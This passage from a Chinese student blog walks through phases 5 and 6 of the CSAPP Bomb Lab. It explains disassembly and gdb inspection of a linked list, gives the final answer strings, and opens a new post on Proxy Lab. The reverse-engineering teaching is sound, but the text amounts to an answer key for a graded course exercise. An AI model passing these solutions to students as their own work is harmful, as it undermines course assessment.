  2. 第二个需要的字符为 e,类似地,e 位于可用字符串的第 6 个,也就是需要选择一个低 4 位为 0101(索引为 5)的字符,选择 e 即可。
  3. 第三个需要的字符为 v,类似地,v 位于可用字符串的第 13 个,也就是需要选择一个低 4 位为 1100(索引为 12)的字符,选择 l 即可。
  4. 第四个需要的字符为 i,类似地,i 位于可用字符串的第 5 个,也就是需要选择一个低 4 位为 0100(索引为 4)的字符,选择 d 即可。
  5. 第五个需要的字符为 l,类似地,l 位于可用字符串的第 16 个,也就是需要选择一个低 4 位为 1111(索引为 15)的字符,选择 o 即可。
  6. 第六个需要的字符为 s,类似地,s 位于可用字符串的第 8 个,也就是需要选择一个低 4 位为 0111(索引为 7)的字符,选择 g 即可。

最终,我们可以得到 phase 5 的答案:

beldog

将其写入 psol.txt 的第五行:

Catherine Earnshaw, may you not rest as long as I am living.
1 2 4 8 16 32
6 q 866
5 20
beldog
pku is better than thu

然后重新使用 gdb 运行程序:

gdb bomb
c

phase5-finish

拿下!

Phase 6

最后一关了,也是最难的、代码长的最离谱的一关:

0000000000001b07 <phase_6>:
    1b07:	f3 0f 1e fa          	endbr64
    1b0b:	41 54                	push   %r12
    1b0d:	55                   	push   %rbp
    1b0e:	53                   	push   %rbx
    1b0f:	48 83 ec 60          	sub    $0x60,%rsp
    1b13:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax
    1b1a:	00 00
    1b1c:	48 89 44 24 58       	mov    %rax,0x58(%rsp)
    1b21:	31 c0                	xor    %eax,%eax
    1b23:	48 89 e6             	mov    %rsp,%rsi
    1b26:	e8 76 06 00 00       	call   21a1 <read_six_numbers>
    1b2b:	bd 00 00 00 00       	mov    $0x0,%ebp
    1b30:	eb 27                	jmp    1b59 <phase_6+0x52>
    1b32:	e8 e4 05 00 00       	call   211b <explode_bomb>
    1b37:	eb 33                	jmp    1b6c <phase_6+0x65>
    1b39:	83 c3 01             	add    $0x1,%ebx
    1b3c:	83 fb 05             	cmp    $0x5,%ebx
    1b3f:	7f 15                	jg     1b56 <phase_6+0x4f>
    1b41:	48 63 c5             	movslq %ebp,%rax
    1b44:	48 63 d3             	movslq %ebx,%rdx
    1b47:	8b 3c 94             	mov    (%rsp,%rdx,4),%edi
    1b4a:	39 3c 84             	cmp    %edi,(%rsp,%rax,4)
    1b4d:	75 ea                	jne    1b39 <phase_6+0x32>
    1b4f:	e8 c7 05 00 00       	call   211b <explode_bomb>
    1b54:	eb e3                	jmp    1b39 <phase_6+0x32>
    1b56:	44 89 e5             	mov    %r12d,%ebp
    1b59:	83 fd 05             	cmp    $0x5,%ebp
    1b5c:	7f 17                	jg     1b75 <phase_6+0x6e>
    1b5e:	48 63 c5             	movslq %ebp,%rax
    1b61:	8b 04 84             	mov    (%rsp,%rax,4),%eax
    1b64:	83 e8 01             	sub    $0x1,%eax
    1b67:	83 f8 05             	cmp    $0x5,%eax
    1b6a:	77 c6                	ja     1b32 <phase_6+0x2b>
    1b6c:	44 8d 65 01          	lea    0x1(%rbp),%r12d
    1b70:	44 89 e3             	mov    %r12d,%ebx
    1b73:	eb c7                	jmp    1b3c <phase_6+0x35>
    1b75:	be 00 00 00 00       	mov    $0x0,%esi
    1b7a:	eb 08                	jmp    1b84 <phase_6+0x7d>
    1b7c:	48 89 54 cc 20       	mov    %rdx,0x20(%rsp,%rcx,8)
    1b81:	83 c6 01             	add    $0x1,%esi
    1b84:	83 fe 05             	cmp    $0x5,%esi
    1b87:	7f 1d                	jg     1ba6 <phase_6+0x9f>
    1b89:	b8 01 00 00 00       	mov    $0x1,%eax
    1b8e:	48 8d 15 7b 65 00 00 	lea    0x657b(%rip),%rdx        # 8110 <node1>
    1b95:	48 63 ce             	movslq %esi,%rcx
    1b98:	39 04 8c             	cmp    %eax,(%rsp,%rcx,4)
    1b9b:	7e df                	jle    1b7c <phase_6+0x75>
    1b9d:	48 8b 52 08          	mov    0x8(%rdx),%rdx
    1ba1:	83 c0 01             	add    $0x1,%eax
    1ba4:	eb ef                	jmp    1b95 <phase_6+0x8e>
    1ba6:	48 8b 5c 24 20       	mov    0x20(%rsp),%rbx
    1bab:	48 89 d9             	mov    %rbx,%rcx
    1bae:	b8 01 00 00 00       	mov    $0x1,%eax
    1bb3:	eb 12                	jmp    1bc7 <phase_6+0xc0>
    1bb5:	48 63 d0             	movslq %eax,%rdx
    1bb8:	48 8b 54 d4 20       	mov    0x20(%rsp,%rdx,8),%rdx
    1bbd:	48 89 51 08          	mov    %rdx,0x8(%rcx)
    1bc1:	83 c0 01             	add    $0x1,%eax
    1bc4:	48 89 d1             	mov    %rdx,%rcx
    1bc7:	83 f8 05             	cmp    $0x5,%eax
    1bca:	7e e9                	jle    1bb5 <phase_6+0xae>
    1bcc:	48 c7 41 08 00 00 00 	movq   $0x0,0x8(%rcx)
    1bd3:	00
    1bd4:	bd 00 00 00 00       	mov    $0x0,%ebp
    1bd9:	eb 07                	jmp    1be2 <phase_6+0xdb>
    1bdb:	48 8b 5b 08          	mov    0x8(%rbx),%rbx
    1bdf:	83 c5 01             	add    $0x1,%ebp
    1be2:	83 fd 04             	cmp    $0x4,%ebp
    1be5:	7f 11                	jg     1bf8 <phase_6+0xf1>
    1be7:	48 8b 43 08          	mov    0x8(%rbx),%rax
    1beb:	8b 00                	mov    (%rax),%eax
    1bed:	39 03                	cmp    %eax,(%rbx)
    1bef:	7e ea                	jle    1bdb <phase_6+0xd4>
    1bf1:	e8 25 05 00 00       	call   211b <explode_bomb>
    1bf6:	eb e3                	jmp    1bdb <phase_6+0xd4>
    1bf8:	48 8b 44 24 58       	mov    0x58(%rsp),%rax
    1bfd:	64 48 33 04 25 28 00 	xor    %fs:0x28,%rax
    1c04:	00 00
    1c06:	75 09                	jne    1c11 <phase_6+0x10a>
    1c08:	48 83 c4 60          	add    $0x60,%rsp
    1c0c:	5b                   	pop    %rbx
    1c0d:	5d                   	pop    %rbp
    1c0e:	41 5c                	pop    %r12
    1c10:	c3                   	ret
    1c11:	e8 7a f6 ff ff       	call   1290 <__stack_chk_fail@plt>

仍旧是先注释掉 .gdbinit 中的 b phase_5 断点。

在做这个 phase 之前,我建议大家先做好心理准备,这个 phase 可能光读懂它就需要数个小时,这是我当初做的笔记:

phase6-notes

略过前面常规的压栈保存被调用者保存寄存器、金丝雀值处理,我们直接进入核心部分:

    1b23:	48 89 e6             	mov    %rsp,%rsi                    # 将栈顶指针作为第二个参数,存储读出的 6 个数字
    1b26:	e8 76 06 00 00       	call   21a1 <read_six_numbers>
    1b2b:	bd 00 00 00 00       	mov    $0x0,%ebp                    # 循环变量初始化
    1b30:	eb 27                	jmp    1b59 <phase_6+0x52>
    1b32:	e8 e4 05 00 00       	call   211b <explode_bomb>
    1b37:	eb 33                	jmp    1b6c <phase_6+0x65>
    1b39:	83 c3 01             	add    $0x1,%ebx                    # 让 %ebx 加 1
    1b3c:	83 fb 05             	cmp    $0x5,%ebx                    # 比较 %ebx 和 5
    1b3f:	7f 15                	jg     1b56 <phase_6+0x4f>          # 如果大于 5,就跳转到 1b56 处
    1b41:	48 63 c5             	movslq %ebp,%rax                    # 否则,将循环变量 %ebp 的值存入 %rax
    1b44:	48 63 d3             	movslq %ebx,%rdx                    # 将 %ebx (→ %r12d → %rbp + 1) 的值存入 %rdx
    1b47:	8b 3c 94             	mov    (%rsp,%rdx,4),%edi           # 取出输入的对应第 %rdx (→ %ebp + 1) 处的值
    1b4a:	39 3c 84             	cmp    %edi,(%rsp,%rax,4)           # 比较输入的对应第 %rax (→ %ebp) 处的值和 %edi(继承于上一条指令,即读出的数组对应 %rdx(→ %ebx → %ebp + 1 ) 处的值)
    1b4d:	75 ea                	jne    1b39 <phase_6+0x32>          # 如果不相等,就跳转到 1b39 处,继续循环
    1b4f:	e8 c7 05 00 00       	call   211b <explode_bomb>          # 如果相等,就跳转到 211b 处,引爆炸弹
    1b54:	eb e3                	jmp    1b39 <phase_6+0x32>          # 炸完了继续 phase 6 的退出过程
    1b56:	44 89 e5             	mov    %r12d,%ebp                   # 将 %r12d 的值存入 %ebp
    1b59:	83 fd 05             	cmp    $0x5,%ebp                    # 循环条件,判断 %ebp 是否大于 5
    1b5c:	7f 17                	jg     1b75 <phase_6+0x6e>          # 跳出条件满足,跳出循环
    1b5e:	48 63 c5             	movslq %ebp,%rax                    # 不跳出,继续循环体
    1b61:	8b 04 84             	mov    (%rsp,%rax,4),%eax           # 取出输入的对应第 %rax (→ %ebp) 处的值,存入 %eax
    1b64:	83 e8 01             	sub    $0x1,%eax                    # %eax 减 1
    1b67:	83 f8 05             	cmp    $0x5,%eax                    # 判断是否大于 5
    1b6a:	77 c6                	ja     1b32 <phase_6+0x2b>          # 如果大于 5,就跳转到 1b32 处,引爆炸弹
    1b6c:	44 8d 65 01          	lea    0x1(%rbp),%r12d              # 否则,将循环变量 %rbp 加 1,存入 %r12d
    1b70:	44 89 e3             	mov    %r12d,%ebx                   # 将 %r12d 的值存入 %ebx
    1b73:	eb c7                	jmp    1b3c <phase_6+0x35>          # 跳转到 1b3c 处,继续循环

我们发现,就像 phase 4 一样,这里首先通过 read_six_numbers 函数读入了 6 个数字(依次存放在 %rsp%rsp + 0x18 的 24 个字节处),然后将 %ebp 置为 0,再进行了一个比较 cmp $0x5,%ebp,如果大于 5,就跳转到 1b75 处。

很显然,这里又是一个循环,循环变量为 %ebp,循环次数为 6 次。

接着看 1b5e 开始的几句指令,我们发现每次循环内,首先读出了一个我们输入的数字,然后减 1,再判断是否大于 5,如果大于 5,就跳转到 1b32 处,引爆炸弹。

这告诉我们,我们输入的每个数字必须小于等于 6。

接着跳转回 1b3c 处,继续循环。我们阅读 1b39 ~ 1b54 的这一段指令,可以发现它通过维护了另外一个循环变量 %ebx,来遍历比较了我们输入的第 1 个数字和后面 5 个数字,如果有相等的,就会爆炸。

继续类推,观察到每次退出这个由 %ebx 控制的子循环后,会在 1b56 处将 %r12d 的值存入 %ebp,从而更新外层循环变量。

于是我们不难推断,这类似于一个冒泡排序:

for(int ebp = 0; ebp < 6; ebp++) {
    for(int ebx = ebp + 1; ebx < 6; ebx++) {
        if(input[ebp] == input[ebx]) {
            explode_bomb();
        }
    }
}

所以这段代码的目的,就是判断我们输入的 6 个数字是否有重复的。

因而我们得知,我们输入的 6 个数字必须是不同的。

所以我们更新 psol.txt,将第 6 行更改为符合要求的数字:

Catherine Earnshaw, may you not rest as long as I am living.
1 2 4 8 16 32
6 q 866
5 20
beldog
2 1 3 4 6 5

继续看下面的代码:

    1b75:	be 00 00 00 00       	mov    $0x0,%esi                    # 将 0 存入 %esi,作为循环变量
    1b7a:	eb 08                	jmp    1b84 <phase_6+0x7d>          # 跳转到 1b84,对于初始化状态,跳过更新 %esi 的指令
    1b7c:	48 89 54 cc 20       	mov    %rdx,0x20(%rsp,%rcx,8)       # 将 %rdx 的值存到 (%rsp + %rcx*8 + 0x20) 的位置
    1b81:	83 c6 01             	add    $0x1,%esi                    # %esi 加 1
    1b84:	83 fe 05             	cmp    $0x5,%esi                    # 比较 %esi 和 5
    1b87:	7f 1d                	jg     1ba6 <phase_6+0x9f>          # 如果大于 5,跳转到 1ba6,这标志了循环会被执行 6 次
    1b89:	b8 01 00 00 00       	mov    $0x1,%eax                    # 将 1 存入 %eax
    1b8e:	48 8d 15 7b 65 00 00 	lea    0x657b(%rip),%rdx            # 8110 <node1> # 加载 node1 的地址到 %rdx
    1b95:	48 63 ce             	movslq %esi,%rcx                    # 将 %esi 符号扩展到 %rcx
    1b98:	39 04 8c             	cmp    %eax,(%rsp,%rcx,4)           # 比较 %eax 和 (%rsp + %rcx*4) 的值
    1b9b:	7e df                	jle    1b7c <phase_6+0x75>          # 如果小于或等于,跳转到 1b7c
    1b9d:	48 8b 52 08          	mov    0x8(%rdx),%rdx               # 将 (%rdx + 8) 的值存入 %rdx
    1ba1:	83 c0 01             	add    $0x1,%eax                    # %eax 加 1
    1ba4:	eb ef                	jmp    1b95 <phase_6+0x8e>          # 跳转到 1b95

不难看出这里还是执行了一个循环,循环变量为 %esi,循环次数为 6 次。

继续阅读代码,发现在 1b8e 处读取了一个叫做 node1 的东西的地址到 %rdx,很自然的联想到这应该是一个线性表,而且大概率是一个链表。我们首先使用 gdbx 命令打印出 %rdx 的值:

gdb bomb
# 此时 b phase_5 应当已经被注释掉了
layout asm
layout regs
# 在 lea    0x657b(%rip),%rdx 的下一行设置断点,从而获得更新后的 %rdx
b *(phase_6+142)
c
# 十进制打印 %rdx 开始的 24 个数
x/24 $rdx

得到输出:

(gdb) x/24 $rdx
0x55ee5f1db110 <node1>: 285     1       1595781408      21998
0x55ee5f1db120 <node2>: 683     2       1595781424      21998
0x55ee5f1db130 <node3>: 324     3       1595781440      21998
0x55ee5f1db140 <node4>: 960     4       1595781456      21998
0x55ee5f1db150 <node5>: 355     5       1595777152      21998
0x55ee5f1db160 <host_table>:    1595766700      21998   1595766709      21998

一下子打印出来 5 个节点,可以看出每个节点的 16 个字节中,最低的 4 个字节是一个大小范围合适的数字,猜测是链表节点的 value 信息,而次低的 4 个字节是一个从 1 开始的递增的数字,猜测是链表节点的 key 信息,而最高的 8 个字节看不出来是个什么东西,所以我们换用 16 进制打印:

x/24x $rdx

得到输出:

(gdb) x/24x $rdx
0x55ee5f1db110 <node1>: 0x0000011d      0x00000001      0x5f1db120      0x000055ee
0x55ee5f1db120 <node2>: 0x000002ab      0x00000002      0x5f1db130      0x000055ee
0x55ee5f1db130 <node3>: 0x00000144      0x00000003      0x5f1db140      0x000055ee
0x55ee5f1db140 <node4>: 0x000003c0      0x00000004      0x5f1db150      0x000055ee
0x55ee5f1db150 <node5>: 0x00000163      0x00000005      0x5f1da080      0x000055ee
0x55ee5f1db160 <host_table>:    0x5f1d77ac      0x000055ee      0x5f1d77b5      0x000055ee

再次观察每个节点的最高 8 个字节,结合我们上课学习的知识,我们知道在现在主流的机器中都采用小端法表示,而且为 64 位机器,所以指针的长度是 8 个字节,进而我们可以推测出,每个节点的最高 8 个字节应该是一个指向下一个节点的指针,譬如,对于 node1 来说,他的最高 8 个字节是 0x5f1db130 0x000055ee,也就是正常表示下的 0x000055ee5f1db130,而这个地址正好是 node2 的地址,所以我们可以推测出,每个节点的最高 8 个字节是一个指向下一个节点的指针。

也就是说,这个链表的每个元素大概是这样的:

struct node {
    int value;
    int key;
    struct node *next;
};

结合我们之前发现整个循环会被执行 6 次,而这里只有 5 个节点,所以我们猜测 node6 应该是被存放在了别的地方,我们使用 node5 的最高 8 个字节推断出 node6 的首地址为 0x000055ee5f1da080,然后使用 x 命令打印出 node6 的内容:

x/4 $0x000055ee5f1da080

得到:

(gdb) x/4 0x000055ee5f1da080
0x55ee5f1da080 <node6>: 0x00000310      0x00000006      0x00000000      0x00000000

发现不知道为啥打印出来是 16 进制,但是我们已经可以从这里看出 node6 的后继指针为 NULL,所以我们可以推断出,node6 是此链表最后的节点。

我们要求它打印出 10 进制:

x/4d 0x000055ee5f1da080

得到:

(gdb) x/4d 0x000055ee5f1da080
0x55ee5f1da080 <node6>: 784     6       0       0

从而我们得到了完整的链表内容:

0x55ee5f1db110 <node1>: 285     1       &node2
0x55ee5f1db120 <node2>: 683     2       &node3
0x55ee5f1db130 <node3>: 324     3       &node4
0x55ee5f1db140 <node4>: 960     4       &node5
0x55ee5f1db150 <node5>: 355     5       &node6
0x55ee5f1da080 <node6>: 784     6       NULL

到这里我们已经完全知道这个数据结构长啥样了,所以回去继续看代码(我懒得上下翻,我想大家应该也不想,所以又复制了一遍):

    1b75:	be 00 00 00 00       	mov    $0x0,%esi                    # 将 0 存入 %esi,作为循环变量
    1b7a:	eb 08                	jmp    1b84 <phase_6+0x7d>          # 跳转到 1b84,对于初始化状态,跳过更新 %esi 的指令
    1b7c:	48 89 54 cc 20       	mov    %rdx,0x20(%rsp,%rcx,8)       # 将 %rdx 的值存到 (%rsp + %rcx*8 + 0x20) 的位置
    1b81:	83 c6 01             	add    $0x1,%esi                    # %esi 加 1
    1b84:	83 fe 05             	cmp    $0x5,%esi                    # 比较 %esi 和 5
    1b87:	7f 1d                	jg     1ba6 <phase_6+0x9f>          # 如果大于 5,跳转到 1ba6
    1b89:	b8 01 00 00 00       	mov    $0x1,%eax                    # 将 1 存入 %eax
    1b8e:	48 8d 15 7b 65 00 00 	lea    0x657b(%rip),%rdx            # 8110 <node1> # 加载 node1 的地址到 %rdx
    1b95:	48 63 ce             	movslq %esi,%rcx                    # 将 %esi 符号扩展到 %rcx
    1b98:	39 04 8c             	cmp    %eax,(%rsp,%rcx,4)           # 比较 %eax 和 (%rsp + %rcx*4) 的值

    1b9b:	7e df                	jle    1b7c <phase_6+0x75>          # 如果小于或等于,跳转到 1b7c

    1b9d:	48 8b 52 08          	mov    0x8(%rdx),%rdx               # 将 (%rdx + 8) 的值存入 %rdx,即准备遍历下一个节点
    1ba1:	83 c0 01             	add    $0x1,%eax                    # %eax 加 1

    1ba4:	eb ef                	jmp    1b95 <phase_6+0x8e>          # 跳转到 1b95

    1ba6:	48 8b 5c 24 20       	mov    0x20(%rsp),%rbx              # 将 (%rsp + 0x20) 的值存入 %rbx
    1bab:	48 89 d9             	mov    %rbx,%rcx                    # 将 %rbx 的值存入 %rcx
    1bae:	b8 01 00 00 00       	mov    $0x1,%eax                    # 将 1 存入 %eax
    1bb3:	eb 12                	jmp    1bc7 <phase_6+0xc0>          # 跳转到 1bc7
    1bb5:	48 63 d0             	movslq %eax,%rdx                    # 将 %eax 符号扩展到 %rdx
    1bb8:	48 8b 54 d4 20       	mov    0x20(%rsp,%rdx,8),%rdx       # 将 (%rsp + %rdx*8 + 0x20) 的值存入 %rdx
    1bbd:	48 89 51 08          	mov    %rdx,0x8(%rcx)               # 将 %rdx 的值存到 (%rcx + 8) 的位置
    1bc1:	83 c0 01             	add    $0x1,%eax                    # %eax 加 1
    1bc4:	48 89 d1             	mov    %rdx,%rcx                    # 将 %rdx 的值存入 %rcx
    1bc7:	83 f8 05             	cmp    $0x5,%eax                    # 比较 %eax 和 5
    1bca:	7e e9                	jle    1bb5 <phase_6+0xae>          # 如果小于或等于,跳转到 1bb5
    1bcc:	48 c7 41 08 00 00 00 	movq   $0x0,0x8(%rcx)               # 将 0 存到 (%rcx + 8) 的位置
    00
    1bd4:	bd 00 00 00 00       	mov    $0x0,%ebp                    # 将 0 存入 %ebp
    1bd9:	eb 07                	jmp    1be2 <phase_6+0xdb>          # 跳转到 1be2
    1bdb:	48 8b 5b 08          	mov    0x8(%rbx),%rbx               # 将 (%rbx + 8) 的值存入 %rbx
    1bdf:	83 c5 01             	add    $0x1,%ebp                    # %ebp 加 1
    1be2:	83 fd 04             	cmp    $0x4,%ebp                    # 比较 %ebp 和 4
    1be5:	7f 11                	jg     1bf8 <phase_6+0xf1>          # 如果大于,跳转到 1bf8
    1be7:	48 8b 43 08          	mov    0x8(%rbx),%rax               # 将 (%rbx + 8) 的值存入 %rax
    1beb:	8b 00                	mov    (%rax),%eax                  # 将 (%rax) 的值存入 %eax
    1bed:	39 03                	cmp    %eax,(%rbx)                  # 比较 %eax 和 (%rbx) 的值
    1bef:	7e ea                	jle    1bdb <phase_6+0xd4>          # 如果小于或等于,跳转到 1bdb
    1bf1:	e8 25 05 00 00       	call   211b <explode_bomb>          # 否则,调用 explode_bomb 函数
    1bf6:	eb e3                	jmp    1bdb <phase_6+0xd4>          # 返回到 1bdb,继续循环

1b95 处开始继续看这个循环,我们发现直到 1b9b 它都会尝试匹配 %eax(不变)和你的输入(变化)的第 %esi 个数字,如果后者小于或等于 %eax ,就跳转到 1b7c 处(同时通过更新 %esi 循环条件进行顺位匹配),而 %eax 又是从 1 开始的,所以它在这里(第 1 次)随便一个 1 ~ 6 的数字都可以通过这个 jle 指令,继续后面的循环。但我们也很容易想到,这里的 %eax 应该会在后续过程中更新,而当它更新到 6 时,那么就只有 6 这个数字可以通过这个 jle 指令。

当通过这个 jle 指令后,进入到 1b9d 处,我们发现它会将 %rdx 更新为 %rdx 的后继指针,然后再将 %eax 加 1,再跳转回 1b95 处,继续循环。

所以我们发现无论什么情况,这里都会往回跳转,唯一跳出的方式是在 1b87 处,将 %esi 更新为 6 时。

而当我们关注 %esi 的时候,我们发下它只有在从 1b9b 跳转到 1b7c 时才会更新,而这个跳转只有在 %eax 没有通过 jle 时才会触发,也就是当 %eax 已经大于你的输入的第 %esi 个数字时,才会触发。此时,%rdx 已经变成了指向你输入的第 %esi 个数字的节点的指针。

所以,我们可以推断出这里的大致逻辑是:

for (esi = 0; esi < 6; esi++) {
    int eax = 1;
    // 遍历链表,找到第 esi 个节点
    while (eax <= esi) {
        node1 = node1->next;
        eax++;
    }
    nodes[esi] = node1;
}

所以,我们可以推断出,这里相当于将我们用户栈上 %rsp + 0x20 开始的一个 nodes 数组中的 6 个元素,依次存放了 6 个指针,分别指向了 6 个节点。顺次为我们输入的数字顺序。

我们可以通过如下方式验证:

gdb bomb
# 在这整个循环跳出的时候设置断点
# 也就是 1ba6 处
b *(phase_6+159)
c
# 以 16 进制打印从 %rsp + 0x20 开始的 6 个 8 字节数
x/6gx $rsp+0x20

得到输出:

(gdb) x/6gx $rsp+0x20
0x7ffde0250b90: 0x000055b5b7f0c120      0x000055b5b7f0c110
0x7ffde0250ba0: 0x000055b5b7f0c130      0x000055b5b7f0c140
0x7ffde0250bb0: 0x000055b5b7f0b080      0x000055b5b7f0c150

回忆一下我们设定的输入是 2 1 3 4 6 5,再结合之前的顺序表:

0x55ee5f1db110 <node1>: 285     1       &node2
0x55ee5f1db120 <node2>: 683     2       &node3
0x55ee5f1db130 <node3>: 324     3       &node4
0x55ee5f1db140 <node4>: 960     4       &node5
0x55ee5f1db150 <node5>: 355     5       &node6
0x55ee5f1da080 <node6>: 784     6       NULL

稍加翻译,得到:

0x7ffde0250b90: &node2
0x7ffde0250b98: &node1
0x7ffde0250ba0: &node3
0x7ffde0250ba8: &node4
0x7ffde0250bb0: &node6
0x7ffde0250bb8: &node5

这和我们的预期是一致的。

再接着看剩下的代码。

    1ba6:	48 8b 5c 24 20       	mov    0x20(%rsp),%rbx              # 将 (%rsp + 0x20) 的值存入 %rbx
    1bab:	48 89 d9             	mov    %rbx,%rcx                    # 将 %rbx 的值存入 %rcx
    1bae:	b8 01 00 00 00       	mov    $0x1,%eax                    # 将 1 存入 %eax,作为循环变量
    1bb3:	eb 12                	jmp    1bc7 <phase_6+0xc0>          # 跳转到 1bc7
    1bb5:	48 63 d0             	movslq %eax,%rdx                    # 将 %eax 符号扩展到 %rdx
    1bb8:	48 8b 54 d4 20       	mov    0x20(%rsp,%rdx,8),%rdx       # 将 (%rsp + %rdx*8 + 0x20) 的值存入 %rdx
    1bbd:	48 89 51 08          	mov    %rdx,0x8(%rcx)               # 将 %rdx 的值存到 (%rcx + 8) 的位置
    1bc1:	83 c0 01             	add    $0x1,%eax                    # %eax 加 1
    1bc4:	48 89 d1             	mov    %rdx,%rcx                    # 将 %rdx 的值存入 %rcx
    1bc7:	83 f8 05             	cmp    $0x5,%eax                    # 比较 %eax 和 5
    1bca:	7e e9                	jle    1bb5 <phase_6+0xae>          # 如果小于或等于,跳转到 1bb5

现在我们已经确定,从 %rsp + 0x20 开始的 6 个 8 字节的内容,是一个指针数组,其中存放了 6 个指针,分别指向了 6 个节点。顺次为第 2 1 3 4 6 5 个节点(即我们的输入)。

接着,从 1ba6 开始,首先把 %rsp + 0x20 指向的值(也就是指向 node2 的指针)放入 %rbx,将 %eax 设置为 1,作为循环变量,然后跳转到 1bc7

1bc7 处,对 %eax 和 5 进行比较,如果小于等于 5,就跳转到 1bb5,否则跳转到 1bcc。由此我们可以推断这是一个循环 5 次的循环,从 1 ~ 5。

回到 1bb5 处,首先将 %eax 符号扩展到 %rdx,然后将 %rsp + %rdx*8 + 0x20 的值存入 %rdx,也就是从 %rsp + 0x20 开始的第 %eax 个指针。

继续,将 %rdx 的值存入 (%rcx + 8),回想第 1 行(1ba6 处),我们知道此时 %rcx 的值是一个指向 node2 的指针,所以这里的操作相当于将 node2next 指针设置为 %rdx 指向的节点。

然后,将 %eax 加 1,将 %rdx 的值存入 %rcx,回到 1bb5 处,继续循环。

由此,我们得到这里的大致逻辑:

struct node *prev_node = nodes[0];
for (eax = 1; eax <= 5; eax++) {
    prev_node->next = nodes[eax];
    prev_node = nodes[eax];
}

也就是说,这里将我们输入的 6 个节点,按照我们输入的顺序,执行了一个重排,重新连接成了一个链表。

原有的链表顺序是:

node1 -> node2 -> node3 -> node4 -> node5 -> node6

现在就成了:

node2 -> node1 -> node3 -> node4 -> node6 -> node5

接着看剩下的代码:

    1bcc:	48 c7 41 08 00 00 00 	movq   $0x0,0x8(%rcx)               # 将 0 存到 (%rcx + 8) 的位置
    00
    1bd4:	bd 00 00 00 00       	mov    $0x0,%ebp                    # 将 0 存入 %ebp
    1bd9:	eb 07                	jmp    1be2 <phase_6+0xdb>          # 跳转到 1be2
    1bdb:	48 8b 5b 08          	mov    0x8(%rbx),%rbx               # 将 (%rbx + 8) 的值存入 %rbx
    1bdf:	83 c5 01             	add    $0x1,%ebp                    # %ebp 加 1
    1be2:	83 fd 04             	cmp    $0x4,%ebp                    # 比较 %ebp 和 4
    1be5:	7f 11                	jg     1bf8 <phase_6+0xf1>          # 如果大于,跳转到 1bf8
    1be7:	48 8b 43 08          	mov    0x8(%rbx),%rax               # 将 (%rbx + 8) 的值存入 %rax
    1beb:	8b 00                	mov    (%rax),%eax                  # 将 (%rax) 的值存入 %eax
    1bed:	39 03                	cmp    %eax,(%rbx)                  # 比较 %eax 和 (%rbx) 的值
    1bef:	7e ea                	jle    1bdb <phase_6+0xd4>          # 如果小于或等于,跳转到 1bdb
    1bf1:	e8 25 05 00 00       	call   211b <explode_bomb>          # 否则,调用 explode_bomb 函数
    1bf6:	eb e3                	jmp    1bdb <phase_6+0xd4>          # 返回到 1bdb,继续循环

这里首先将 0 存入 (%rcx + 8) 的位置,也就是将之前排序完的最后一个节点(在这里对应 node5)的 next 指针设置为 NULL

然后将 0 存入 %ebp,作为循环变量,跳转到 1be2

1be2 处,比较 %ebp 和 4,如果大于 4,就跳转到 1bf8(对应后续的 phase_6 函数的正常退出流程),否则顺序执行 1be7

1be7 处,将 (%rbx + 8) 的值存入 %rax,回看上一部分的开头,%rbx 的值是指向我们用户栈里的 6 个指针的第 1 个指针的指针,所以这里的操作相当于把这 6 个指针中的第 2 个指针的值存入 %rbx

继续,将 %ebp 加 1,比较其与 4 的大小,如果大于 4,就跳转到 1bf8 正常退出函数,否则顺序执行 1be7

1be7 处,将 (%rbx + 8) 的值存入 %rax,也就是保存下一个节点的地址。

然后使用 (%rax) 读出下一个节点的 value,与对应当前节点的 value(%rbx) 执行比较,如果当前节点的 value 小于等于下一个节点的 value,就跳转到 1bdb 继续判断下一个节点,否则顺序执行到 1bf1 处,调用 explode_bomb 函数,引发爆炸。

所以这里的大致逻辑是:

struct node *cur_node = nodes[0];
for (ebp = 0; ebp <= 4; ebp++) {
    struct node *next_node = cur_node->next;
    if (cur_node->value > next_node->value) {
        explode_bomb();
    }
    cur_node = cur_node->next;
}

至此,我们总算搞明白了 phase_6 整个的函数逻辑,可以开始构造正确的输入了。

首先回顾一下我们读出的初始链表长啥样:

0x55ee5f1db110 <node1>: 285     1       &node2
0x55ee5f1db120 <node2>: 683     2       &node3
0x55ee5f1db130 <node3>: 324     3       &node4
0x55ee5f1db140 <node4>: 960     4       &node5
0x55ee5f1db150 <node5>: 355     5       &node6
0x55ee5f1da080 <node6>: 784     6       NULL

将之根据 value 的值,从小到大排序,得到:

0x55ee5f1db110 <node1>: 285     1       &node2
0x55ee5f1db130 <node3>: 324     3       &node4
0x55ee5f1db150 <node5>: 355     5       &node6
0x55ee5f1db120 <node2>: 683     2       &node3
0x55ee5f1da080 <node6>: 784     6       NULL
0x55ee5f1db140 <node4>: 960     4       &node5

现在,这个 nodeNN 信息的顺序,就是我们的答案:

1 3 5 2 6 4

将之添加到 psol.txt 中:

Catherine Earnshaw, may you not rest as long as I am living.
1 2 4 8 16 32
6 q 866
5 20
beldog
1 3 5 2 6 4

然后重启程序:

gdb bomb
# 此时 b phase_5 应当已经被注释掉了
c

phase6-finish

终于,我们完成了整个实验,我也结束了十数个小时的折磨。

当时做的时候,当你完成的时候应该是有这么一行的,但是现在不知道为什么没了,hhh。

But,I can't give you a clear answer yet. You need to measure it yourself.

写在结尾:重做 Bomb lab 的感觉真的是挺无聊的,最初做的时候还不知道怎么安全化一个炸弹,每次都胆战心惊,而且当时不太会静态分析源码,大多数情况下都是结合着 gdb 一步一步 ni 观察变化,甚至一次次地去猜... 虽然麻烦,但至少真的有趣,而且真的学到了很多东西。

但是现在,已经考完试的寒假,坚持着来画上十数个小时重做一遍,还要撰写这么长的文章,只能说完全是凭借毅力和强迫症了 hhh

参考

不周山 / 【读厚 CSAPP】II Bomb Lab:这篇文章就是我当时做的时候主要的参考,讲的没我细(没我废话这么多),而且最后一个 phase 不太一样,供参考。

💾

更适合北大宝宝体质的 Proxy Lab 踩坑记

2024年1月11日 03:45

[!CAUTION]

致各位同学:本笔记的撰写目的是用作参考,请勿直接抄袭,否则后果自负。

我的推荐做法是,你可以阅读我的博文后了解都有哪些坑,但自己实现的时候千万不要看我的代码,避免抄袭风险。

Proxy lab 是 ICS 课程的最后一个 lab,其要求我们实现一个 HTTP 代理服务器,从而实现在客户端和服务端之间中介的功能。

这个 lab 看似只需要网络编程这一章的知识,然而实际做起来,其涉及了第三部分(系统级 I/O、网络编程、并发编程)全部的知识。

在这个 lab 中,我们所实现的 HTTP 代理服务器要求至少实现以下功能:

